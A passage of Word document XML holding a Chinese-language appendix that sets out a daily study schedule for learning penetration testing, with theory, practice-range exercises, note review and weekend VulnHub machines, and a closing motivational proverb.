        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>附：推荐每日学习节奏</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>上午</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">  1.5小时 - 学习新漏洞理论 + 看实操视频或文章</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>下午</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">  2小时 - 在靶场中动手复现，记录踩坑过程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>晚上</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">  1小时 - 复盘、做笔记、尝试写自动化脚本</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>周末</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">  做综合靶机，如VulnHub整机渗透</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A478A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>--- 路虽远，行则将至；事虽难，做则必成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